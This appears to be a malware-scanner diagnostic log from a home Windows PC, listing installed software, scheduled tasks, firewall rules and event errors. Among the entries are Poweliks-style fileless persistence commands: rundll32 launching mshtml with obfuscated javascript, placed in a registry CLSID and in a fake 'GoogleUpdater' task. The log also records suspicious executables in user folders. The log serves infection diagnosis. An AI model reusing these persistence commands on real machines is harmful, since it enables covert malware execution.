Governor of Poker 2 Premium Edition (x32 Version: 2.2.0.95 - WildTangent) Hidden
Hewlett-Packard ACLM.NET v1.2.2.3 (x32 Version: 1.00.0000 - Hewlett-Packard Company) Hidden
Hoyle Card Games (x32 Version: 2.2.0.95 - WildTangent) Hidden
HP Documentation (HKLM-x32\...\{AE986BF5-B6E3-4F8D-B412-A3DD90DF5146}) (Version: 1.1.1.0 - Hewlett-Packard)
HP Games (HKLM-x32\...\WildTangent hp Master Uninstall) (Version: 1.0.3.0 - WildTangent)
HP MyRoom (HKLM-x32\...\{9C35EDE5-4B0F-45E7-A438-314BA889948E}) (Version: 9.0.0.0 - Hewlett-Packard Company)
HP Quick Launch (HKLM-x32\...\{4ED7050C-9332-4FB2-AB07-E94F25A53D39}) (Version: 3.0.3 - Hewlett-Packard Company)
HP Registration Service (HKLM\...\{E4D6CCF2-0AAF-4B9C-9DE5-893EDC9B4BAA}) (Version: 1.0.5976.4186 - Hewlett-Packard)
HP Software Framework (HKLM-x32\...\{675D093B-815D-47FD-AB2C-192EC751E8E2}) (Version: 4.6.10.1 - Hewlett-Packard Company)
HP Support Assistant (HKLM-x32\...\{E35A3B13-78CD-4967-8AC8-AA9FDA693EDE}) (Version: 7.4.45.4 - Hewlett-Packard Company)
HP Utility Center (HKLM-x32\...\{0C57987A-A03A-4B95-A309-D23F78F406CA}) (Version: 1.0.7 - Hewlett-Packard)
HP Wireless Button Driver (HKLM-x32\...\{941DE69D-6CEE-4171-8F1F-3D7E352AA498}) (Version: 1.0.6.1 - Hewlett-Packard Company)
iscsicli (HKLM\...\{f48a0c57-7c48-461c-9957-ab255ddc986e}.sdb) (Version:  - )
Jewel Match 3 (x32 Version: 2.2.0.98 - WildTangent) Hidden
John Deere Drive Green (x32 Version: 2.2.0.95 - WildTangent) Hidden
Luxor Evolved (x32 Version: 2.2.0.98 - WildTangent) Hidden
Mahjongg Dimensions Deluxe: Tiles in Time (x32 Version: 2.2.0.98 - WildTangent) Hidden
Malwarebytes Anti-Malware version 2.1.8.1057 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.1.8.1057 - Malwarebytes Corporation)
Microsoft Office (HKLM-x32\...\{95140000-0070-0000-0000-0000000FF1CE}) (Version: 14.0.6120.5004 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.30319 (HKLM\...\{DA5E371C-6333-3D8A-93A4-6FD5B20BCC6E}) (Version: 10.0.30319 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.30319 (HKLM-x32\...\{196BB40D-1578-3D01-B289-BEFC77A11A1E}) (Version: 10.0.30319 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.50727 (HKLM-x32\...\{15134cb0-b767-4960-a911-f2d16ae54797}) (Version: 11.0.50727.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.50727 (HKLM-x32\...\{22154f09-719a-4619-bb71-5b3356999fbf}) (Version: 11.0.50727.1 - Microsoft Corporation)
Mortimer Beckett and the Crimson Thief Premium Edition (x32 Version: 2.2.0.98 - WildTangent) Hidden
Mystery P.I. - Curious Case of Counterfeit Cove (x32 Version: 2.2.0.98 - WildTangent) Hidden
Peggle Nights (x32 Version: 2.2.0.98 - WildTangent) Hidden
Penguins! (x32 Version: 2.2.0.98 - WildTangent) Hidden
Polar Bowler (x32 Version: 2.2.0.97 - WildTangent) Hidden
Polar Golfer (x32 Version: 2.2.0.98 - WildTangent) Hidden
Qualcomm Atheros Driver Installation Program (HKLM-x32\...\{C3A32068-8AB1-4327-BB16-BED9C6219DC7}) (Version: 10.0 - Qualcomm Atheros)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 8.2.612.2012 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6662 - Realtek Semiconductor Corp.)
Realtek PCIE Card Reader (HKLM-x32\...\{C1594429-8296-4652-BF54-9DBE4932A44C}) (Version: 6.1.8400.29025 - Realtek Semiconductor Corp.)
Roads of Rome 3 (x32 Version: 2.2.0.98 - WildTangent) Hidden
swMSM (x32 Version: 12.0.0.1 - Adobe Systems, Inc) Hidden
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 16.6.1.3 - Synaptics Incorporated)
Tales of Lagoona (x32 Version: 2.2.0.110 - WildTangent) Hidden
Update Installer for WildTangent Games App (x32 Version:  - WildTangent) Hidden
Vacation Quest™ - Australia (x32 Version: 2.2.0.98 - WildTangent) Hidden
WildTangent Games (HKLM-x32\...\WildTangent wildgames Master Uninstall) (Version: 1.0.3.0 - WildTangent)
WildTangent Games App (x32 Version: 4.0.9.6 - WildTangent) Hidden
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 15.4.3555.0308 - Microsoft Corporation)
Zuma's Revenge (x32 Version: 2.2.0.98 - WildTangent) Hidden
 
==================== Custom CLSID (Whitelisted): ==========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
CustomCLSID: HKU\S-1-5-21-2321640021-2341620851-140482586-1002_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?
 
==================== Restore Points =========================
 
ATTENTION: System Restore is disabled
 
==================== Hosts content: ===============================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2013-08-22 09:25 - 2013-08-22 09:25 - 00000824 ____A C:\WINDOWS\system32\Drivers\etc\hosts
 
==================== Scheduled Tasks (Whitelisted) =============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
Task: {21C0BD54-D728-412C-9687-5BD843CE459F} - System32\Tasks\Hewlett-Packard\HP Support Assistant\Update Check => C:\ProgramData\Hewlett-Packard\HP Support Framework\Resources\Updater7\HPSFUpdater.exe [2014-05-12] (Hewlett-Packard Company)
Task: {333FA58A-DFAA-4385-AA61-B33438154251} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\WINDOWS\system32\MRT.exe [2015-07-03] (Microsoft Corporation)
Task: {42606C78-3E7A-474E-9FB5-D30D039784CB} - System32\Tasks\GoogleUpdater => Rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write((new%20ActiveXObject("WScript.Shell")).RegRead("HKCU\\software\\microsoft\\internet explorer\\zergling_rush"))
Task: {4C2BD9C4-DC7D-49BA-9C3C-04F32D4276BD} - System32\Tasks\MirageAgent => C:\Program Files (x86)\CyberLink\YouCam\YCMMirage.exe [2012-07-27] (CyberLink)
Task: {79265C83-DBF1-4920-878D-0F9B507752FF} - System32\Tasks\Synaptics TouchPad Enhancements => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2013-05-16] (Synaptics Incorporated)
Task: {9D9C2496-8F90-45D0-95F6-D62F07B68205} - System32\Tasks\Hewlett-Packard\HP Support Assistant\PC Health Analysis => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2013-11-04] (Hewlett-Packard Company)
Task: {A82515B8-3006-4D3A-88A8-FE04D02C7192} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-07-27] (Google Inc.)
Task: {D40B0C6F-3A4C-4FBD-825B-B0A520FC47FB} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Assistant Quick Start => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2013-11-04] (Hewlett-Packard Company)
Task: {EBE40865-385F-454E-8EE7-98C98B1302B3} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-07-27] (Google Inc.)
Task: {F5715D4F-B262-4590-8487-ACEB028F19D5} - System32\Tasks\autochk => C:\Users\Richie\AppData\Roaming\Microsoft\Windows\IEUpdate\autochk.exe <==== ATTENTION
Task: {F788831C-2C82-4174-8FBD-CE944B364117} - System32\Tasks\CLMLSvc_P2G8 => C:\Program Files (x86)\CyberLink\Power2Go8\CLMLSvc_P2G8.exe [2012-06-07] (CyberLink)
 
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
 
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\HPCeeScheduleForRichie.job => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe
Task: C:\WINDOWS\Tasks\Synaptics TouchPad Enhancements.job => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
 
==================== Loaded Modules (Whitelisted) ==============
 
2012-08-06 15:09 - 2012-08-06 15:09 - 00073728 _____ () C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Container.Wlan.dll
2012-08-06 15:08 - 2012-08-06 15:08 - 00103424 _____ () C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Proxy.Native.dll
2013-04-23 03:39 - 2012-06-07 23:34 - 00627216 _____ () C:\Program Files (x86)\CyberLink\Power2Go8\CLMediaLibrary.dll
2012-06-08 14:34 - 2012-06-08 14:34 - 00016400 _____ () C:\Program Files (x86)\CyberLink\Power2Go8\CLMLSvcPS.dll
2015-07-27 20:51 - 2015-07-23 18:39 - 01405768 _____ () C:\Program Files (x86)\Google\Chrome\Application\44.0.2403.107\libglesv2.dll
2015-07-27 20:51 - 2015-07-23 18:39 - 00081224 _____ () C:\Program Files (x86)\Google\Chrome\Application\44.0.2403.107\libegl.dll
2015-07-27 20:51 - 2015-07-23 18:39 - 16308040 _____ () C:\Program Files (x86)\Google\Chrome\Application\44.0.2403.107\PepperFlash\pepflashplayer.dll
 
==================== Alternate Data Streams (Whitelisted) =========
 
(If an entry is included in the fixlist, only the ADS will be removed.)
 
AlternateDataStreams: C:\Users\Richie\OneDrive:ms-properties
 
==================== Safe Mode (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
 
 
==================== EXE Association (Whitelisted) ===============
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed.)
 
 
==================== Internet Explorer trusted/restricted ===============
 
(If an entry is included in the fixlist, it will be removed from the registry.)
 
 
==================== Other Areas ============================
 
(Currently there is no automatic fix for this section.)
 
HKU\S-1-5-21-2321640021-2341620851-140482586-1002\Control Panel\Desktop\\Wallpaper -> C:\Users\Richie\Pictures\first wallapaper.jpg
DNS Servers: 192.168.254.254
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.
 
==================== MSCONFIG/TASK MANAGER disabled items ==
 
(Currently there is no automatic fix for this section.)
 
HKLM\...\StartupApproved\Run32: => "{b090579d-244c-e682-7cd6-e6daa5c7aff0}"
HKU\S-1-5-21-2321640021-2341620851-140482586-1002\...\StartupApproved\Run: => "{beedd195-7534-c93e-bcaf-0a2671d4725d}"
HKU\S-1-5-21-2321640021-2341620851-140482586-1002\...\StartupApproved\Run: => "Svc2dll"
 
==================== FirewallRules (Whitelisted) ===============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139
FirewallRules: [{0367362F-B34E-4E4D-BFDA-641E8F62D018}] => (Allow) C:\Windows\system32\calc.exe
FirewallRules: [{AFB2689E-3ACF-464D-AB93-0860F07FE12D}] => (Allow) C:\Windows\system32\calc.exe
FirewallRules: [{F1733FB4-9B3E-400A-BB00-F6CC0B4C6073}] => (Allow) C:\Windows\system32\calc.exe
FirewallRules: [{484FB357-14FA-47F8-B46B-FD7927B427C4}] => (Allow) C:\Windows\system32\calc.exe
FirewallRules: [UDP Query User{EF808760-8554-4060-B4E7-D5950FC3902E}C:\users\richie\appdata\roaming\microsoft\windows\ieupdate\autochk.exe] => (Block) C:\users\richie\appdata\roaming\microsoft\windows\ieupdate\autochk.exe
FirewallRules: [TCP Query User{AB01AA61-E7EA-428A-A867-B57497C9F494}C:\users\richie\appdata\roaming\microsoft\windows\ieupdate\autochk.exe] => (Block) C:\users\richie\appdata\roaming\microsoft\windows\ieupdate\autochk.exe
FirewallRules: [UDP Query User{A9318B5F-F5DB-426E-AB8D-BBFCA3A38D4B}C:\users\richie\appdata\roaming\microsoft\windows\ieupdate\autochk.exe] => (Allow) C:\users\richie\appdata\roaming\microsoft\windows\ieupdate\autochk.exe
FirewallRules: [TCP Query User{0242F7F3-6EEB-418D-9D50-6F03F90397A9}C:\users\richie\appdata\roaming\microsoft\windows\ieupdate\autochk.exe] => (Allow) C:\users\richie\appdata\roaming\microsoft\windows\ieupdate\autochk.exe
FirewallRules: [UDP Query User{F7BB5D3C-46CF-4A8F-A8FB-D095D7908EB4}C:\programdata\windows genuine advantage\{417cb0b8-dd5d-4eca-aac2-29f72ed82c05}\msiexec.exe] => (Block) C:\programdata\windows genuine advantage\{417cb0b8-dd5d-4eca-aac2-29f72ed82c05}\msiexec.exe
FirewallRules: [TCP Query User{FF68882B-DEC8-4FD2-AB9A-A31A33B28E78}C:\programdata\windows genuine advantage\{417cb0b8-dd5d-4eca-aac2-29f72ed82c05}\msiexec.exe] => (Block) C:\programdata\windows genuine advantage\{417cb0b8-dd5d-4eca-aac2-29f72ed82c05}\msiexec.exe
FirewallRules: [UDP Query User{5672CFF1-5077-4832-A66D-5DC72472DEAA}C:\programdata\windows genuine advantage\{f2eac7ec-3a48-43e2-904f-a00d1e2b26a1}\msiexec.exe] => (Block) C:\programdata\windows genuine advantage\{f2eac7ec-3a48-43e2-904f-a00d1e2b26a1}\msiexec.exe
FirewallRules: [TCP Query User{F350B76A-5709-4031-A0B2-A6792F59508F}C:\programdata\windows genuine advantage\{f2eac7ec-3a48-43e2-904f-a00d1e2b26a1}\msiexec.exe] => (Block) C:\programdata\windows genuine advantage\{f2eac7ec-3a48-43e2-904f-a00d1e2b26a1}\msiexec.exe
FirewallRules: [UDP Query User{97979C99-34E0-4EC1-AF1A-8BAC2CE4CF89}C:\programdata\windows genuine advantage\{9f2ed5e0-8e8d-4d02-9679-9380819a8e32}\msiexec.exe] => (Block) C:\programdata\windows genuine advantage\{9f2ed5e0-8e8d-4d02-9679-9380819a8e32}\msiexec.exe
FirewallRules: [TCP Query User{38C11876-2476-4982-9182-79E6C4F63D13}C:\programdata\windows genuine advantage\{9f2ed5e0-8e8d-4d02-9679-9380819a8e32}\msiexec.exe] => (Block) C:\programdata\windows genuine advantage\{9f2ed5e0-8e8d-4d02-9679-9380819a8e32}\msiexec.exe
FirewallRules: [UDP Query User{0B3EE6F2-A56E-4E1A-88B5-D0BC77494E14}C:\users\richie\appdata\local\svcxdcl32.exe] => (Block) C:\users\richie\appdata\local\svcxdcl32.exe
FirewallRules: [TCP Query User{8C7D3494-C17B-4DC4-B100-AFC59270E026}C:\users\richie\appdata\local\svcxdcl32.exe] => (Block) C:\users\richie\appdata\local\svcxdcl32.exe
FirewallRules: [UDP Query User{60D6A347-AD97-4573-9543-4D9001A15122}C:\windows\syswow64\rundll32.exe] => (Block) C:\windows\syswow64\rundll32.exe
FirewallRules: [TCP Query User{15D61185-C31B-406A-807B-382C68B1E17B}C:\windows\syswow64\rundll32.exe] => (Block) C:\windows\syswow64\rundll32.exe
FirewallRules: [UDP Query User{BC7DF472-3B0B-451C-8A71-CBF119219BFB}C:\programdata\windows genuine advantage\{c6fad9c2-4cc9-424d-970e-64ea294868b4}\msiexec.exe] => (Block) C:\programdata\windows genuine advantage\{c6fad9c2-4cc9-424d-970e-64ea294868b4}\msiexec.exe
FirewallRules: [TCP Query User{4D5AA3AC-4BF6-4CDD-B29F-76188BAD4E31}C:\programdata\windows genuine advantage\{c6fad9c2-4cc9-424d-970e-64ea294868b4}\msiexec.exe] => (Block) C:\programdata\windows genuine advantage\{c6fad9c2-4cc9-424d-970e-64ea294868b4}\msiexec.exe
FirewallRules: [UDP Query User{48B40DE2-B00D-4312-B123-626009D258F8}C:\users\richie\appdata\local\svcxdcl32.exe] => (Block) C:\users\richie\appdata\local\svcxdcl32.exe
FirewallRules: [TCP Query User{9F15730A-F959-466B-94B9-02D3A01687C3}C:\users\richie\appdata\local\svcxdcl32.exe] => (Block) C:\users\richie\appdata\local\svcxdcl32.exe
FirewallRules: [{65ED69FA-B62D-4206-855D-64915622B516}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD10\PowerDVD10.EXE
FirewallRules: [{58AB6517-29D5-488A-9694-8830A06A20E5}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{112A4FFD-ACB4-4865-BBAB-EAF9D1349E34}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{5F1791B8-A2D1-4AF6-ABC7-274A66B1FF3F}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{C2156354-BF49-409D-8C2B-6F9A9E0A341A}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{D58582AF-22E5-4C02-B344-27C8199D947D}] => (Allow) LPort=1900
FirewallRules: [{5BD7BD99-EDCD-4755-AAEF-AB70F3F31B7C}] => (Allow) LPort=2869
FirewallRules: [{0758B42B-2DD6-4329-8DF8-FAECA7B668B1}] => (Allow) C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe
FirewallRules: [{7C6903FB-5408-496E-81FE-642B92E1AFE6}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
 
==================== Faulty Device Manager Devices =============
 
 
==================== Event log errors: =========================
 
Application errors:
==================
Error: (07/28/2015 04:35:24 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: RICHIE)
Description: Activation of app Microsoft.BingWeather_8wekyb3d8bbwe!App failed with error: -2144927148 See the Microsoft-Windows-TWinUI/Operational log for additional information.
 
Error: (07/28/2015 04:24:20 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program LiveComm.exe version 17.5.9600.20911 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.
 
Process ID: 41c
 
Start Time: 01d0c9724f6ca9a8
 
Termination Time: 4294967295
 
Application Path: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbwe\LiveComm.exe
 
Report Id: 9da4f213-3566-11e5-8188-2c59e5a5a8a3
 
Faulting package full name: microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbwe
 
Faulting package-relative application ID: ppleae38af2e007f4358a809ac99a64a67c1
 
Error: (07/28/2015 04:14:18 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: MsMpEng.exe, version: 4.7.205.0, time stamp: 0x54cb5aeb
Faulting module name: mpengine.dll, version: 1.1.9700.0, time stamp: 0x51d28fcb
Exception code: 0xc0000005
Fault offset: 0x00000000005615b7
Faulting process id: 0x11bc
Faulting application start time: 0xMsMpEng.exe0
Faulting application path: MsMpEng.exe1
Faulting module path: MsMpEng.exe2
Report Id: MsMpEng.exe3
Faulting package full name: MsMpEng.exe4
Faulting package-relative application ID: MsMpEng.exe5
 
Error: (07/28/2015 04:12:10 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: MsMpEng.exe, version: 4.7.205.0, time stamp: 0x54cb5aeb
Faulting module name: mpengine.dll, version: 1.1.9700.0, time stamp: 0x51d28fcb
Exception code: 0xc0000005
Fault offset: 0x00000000005615b7
Faulting process id: 0xaa8
Faulting application start time: 0xMsMpEng.exe0
Faulting application path: MsMpEng.exe1
Faulting module path: MsMpEng.exe2
Report Id: MsMpEng.exe3
Faulting package full name: MsMpEng.exe4
Faulting package-relative application ID: MsMpEng.exe5
 
Error: (07/28/2015 04:11:58 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program LiveComm.exe version 17.5.9600.20911 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.
 
Process ID: b7c
 
Start Time: 01d0c970ef145790
 
Termination Time: 4294967295
 
Application Path: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbwe\LiveComm.exe
 
Report Id: e358a469-3564-11e5-8188-2c59e5a5a8a3
 
Faulting package full name: microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbwe
 
Faulting package-relative application ID: ppleae38af2e007f4358a809ac99a64a67c1
 
Error: (07/28/2015 04:09:05 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: MsMpEng.exe, version: 4.7.205.0, time stamp: 0x54cb5aeb
Faulting module name: mpengine.dll, version: 1.1.9700.0, time stamp: 0x51d28fcb
Exception code: 0xc0000005
Fault offset: 0x00000000005615b7
Faulting process id: 0x544
Faulting application start time: 0xMsMpEng.exe0
Faulting application path: MsMpEng.exe1
Faulting module path: MsMpEng.exe2
Report Id: MsMpEng.exe3
Faulting package full name: MsMpEng.exe4
Faulting package-relative application ID: MsMpEng.exe5
 
Error: (07/28/2015 03:53:28 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program LiveComm.exe version 17.5.9600.20911 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.
 
Process ID: b70
 
Start Time: 01d0c96e0fcb8811
 
Termination Time: 4294967295
 
Application Path: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbwe\LiveComm.exe
 
Report Id: 4f54cd74-3562-11e5-8187-2c59e5a5a8a3
 
Faulting package full name: microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbwe
 
Faulting package-relative application ID: ppleae38af2e007f4358a809ac99a64a67c1
 
Error: (07/28/2015 03:27:51 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program LiveComm.exe version 17.5.9600.20911 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.
 
Process ID: c28
 
Start Time: 01d0c96a6c9094da
 
Termination Time: 4294967295
 
Application Path: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbwe\LiveComm.exe
 
Report Id: b9e7cc70-355e-11e5-8187-2c59e5a5a8a3
 
Faulting package full name: microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbwe
 
Faulting package-relative application ID: ppleae38af2e007f4358a809ac99a64a67c1
 
Error: (07/28/2015 03:20:24 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: RICHIE)
Description: Activation of app Microsoft.BingTravel_8wekyb3d8bbwe!AppexTravel failed with error: -2144927148 See the Microsoft-Windows-TWinUI/Operational log for additional information.
 
Error: (07/28/2015 02:58:12 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program LiveComm.exe version 17.5.9600.20911 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.
 
Process ID: a2c
 
Start Time: 01d0c96649b3afff
 
Termination Time: 4294967295
 
Application Path: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbwe\LiveComm.exe
 
Report Id: 96c3afc4-355a-11e5-8187-2c59e5a5a8a3
 
Faulting package full name: microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbwe
 
Faulting package-relative application ID: ppleae38af2e007f4358a809ac99a64a67c1
 
 
System errors:
=============
Error: (07/28/2015 04:14:18 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The Windows Defender Service service terminated unexpectedly.  It has done this 3 time(s).
 
Error: (07/28/2015 04:12:10 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Windows Defender Service service terminated unexpectedly.  It has done this 2 time(s).  The following corrective action will be taken in 60000 milliseconds: Restart the service.
 
Error: (07/28/2015 04:09:08 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Windows Defender Service service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 60000 milliseconds: Restart the service.
 
Error: (07/28/2015 04:03:24 PM) (Source: DCOM) (EventID: 10010) (User: RICHIE)
Description: {4545DEA0-2DFC-4906-A728-6D986BA399A9}
 
Error: (07/28/2015 04:03:24 PM) (Source: DCOM) (EventID: 10010) (User: RICHIE)
Description: {4545DEA0-2DFC-4906-A728-6D986BA399A9}
 
Error: (07/28/2015 04:03:24 PM) (Source: DCOM) (EventID: 10010) (User: RICHIE)
Description: {4545DEA0-2DFC-4906-A728-6D986BA399A9}
 
Error: (07/28/2015 04:03:24 PM) (Source: DCOM) (EventID: 10010) (User: RICHIE)
Description: {4545DEA0-2DFC-4906-A728-6D986BA399A9}
 
Error: (07/28/2015 04:03:24 PM) (Source: DCOM) (EventID: 10010) (User: RICHIE)
Description: {4545DEA0-2DFC-4906-A728-6D986BA399A9}
 
Error: (07/28/2015 04:03:24 PM) (Source: DCOM) (EventID: 10010) (User: RICHIE)
Description: {4545DEA0-2DFC-4906-A728-6D986BA399A9}
 
Error: (07/28/2015 04:03:23 PM) (Source: DCOM) (EventID: 10010) (User: RICHIE)
Description: {4545DEA0-2DFC-4906-A728-6D986BA399A9}
 
 
Microsoft Office:
=========================
Error: (07/28/2015 04:35:24 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: RICHIE)
Description: Microsoft.BingWeather_8wekyb3d8bbwe!App-2144927148
 
Error: (07/28/2015 04:24:20 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: LiveComm.exe17.5.9600.2091141c01d0c9724f6ca9a84294967295C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbwe\LiveComm.exe9da4f213-3566-11e5-8188-2c59e5a5a8a3microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbweppleae38af2e007f4358a809ac99a64a67c1
 
Error: (07/28/2015 04:14:18 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: MsMpEng.exe4.7.205.054cb5aebmpengine.dll1.1.9700.051d28fcbc000000500000000005615b711bc01d0c971d3343371C:\Program Files\Windows Defender\MsMpEng.exeC:\ProgramData\Microsoft\Windows Defender\Definition Updates\Default\mpengine.dll397e2d38-3565-11e5-8188-2c59e5a5a8a3
 
Error: (07/28/2015 04:12:10 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: MsMpEng.exe4.7.205.054cb5aebmpengine.dll1.1.9700.051d28fcbc000000500000000005615b7aa801d0c971668a7970C:\Program Files\Windows Defender\MsMpEng.exeC:\ProgramData\Microsoft\Windows Defender\Definition Updates\Default\mpengine.dllecdf70cc-3564-11e5-8188-2c59e5a5a8a3
 
Error: (07/28/2015 04:11:58 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: LiveComm.exe17.5.9600.20911b7c01d0c970ef1457904294967295C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbwe\LiveComm.exee358a469-3564-11e5-8188-2c59e5a5a8a3microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbweppleae38af2e007f4358a809ac99a64a67c1
 
Error: (07/28/2015 04:09:05 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: MsMpEng.exe4.7.205.054cb5aebmpengine.dll1.1.9700.051d28fcbc000000500000000005615b754401d0c970ce6678bbC:\Program Files\Windows Defender\MsMpEng.exeC:\ProgramData\Microsoft\Windows Defender\Definition Updates\Default\mpengine.dll7f020f21-3564-11e5-8188-2c59e5a5a8a3
 
Error: (07/28/2015 03:53:28 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: LiveComm.exe17.5.9600.20911b7001d0c96e0fcb88114294967295C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbwe\LiveComm.exe4f54cd74-3562-11e5-8187-2c59e5a5a8a3microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbweppleae38af2e007f4358a809ac99a64a67c1
 
